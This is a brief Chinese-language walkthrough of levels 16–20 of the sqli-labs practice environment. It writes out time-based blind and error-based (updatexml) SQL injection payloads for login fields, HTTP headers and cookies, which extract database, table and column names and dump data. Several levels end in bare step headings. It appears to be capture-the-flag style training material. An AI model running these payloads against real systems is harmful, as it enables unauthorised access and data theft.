sqli labs 16-20

16
判断数据库长度admin") and if(length(database())=8,sleep(5),1)#
判断数据库第一个字母admin") and if(substr(database(),1,1)='s',sleep(5),1)#
依次判断完，为security
再判断表长admin") and if(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(5),1)#
表名admin") and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)='u',sleep(5),1)#
依次判断完，为users
再接着判断列，数据用相同的盲注方法

17
此题注入点在new password，先在User Name 中输入admin
再在new password中输入uname=admin&passwd=admin' and updatexml(1,concat(0x7e, database(),0x7e),1)#得数据库名称
再爆表名，new password中输入admin会出错，就用1代替1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) #片

爆列名1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) #

爆数据，因为爆USER出现错误，就爆emails1' and updatexml(1,concat(0x7e,(select group_concat(id) from emails),0x7e),1) #

18
在火狐插件ModHeader填写相关信息及爆库，再在usename password中输入正确密码admin，得数据库名称

爆表，同样在插件中进行输入’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1) or ‘1’='1，再输入密码

爆列，与前面一样

爆数据

19
这道题和前一道相似，只需将User-Agent改为Referer

爆库
爆表爆列
爆数据

20
在火狐插件Cookie Editor中进行操作，爆库，再将页面刷新


爆表


爆列

爆数据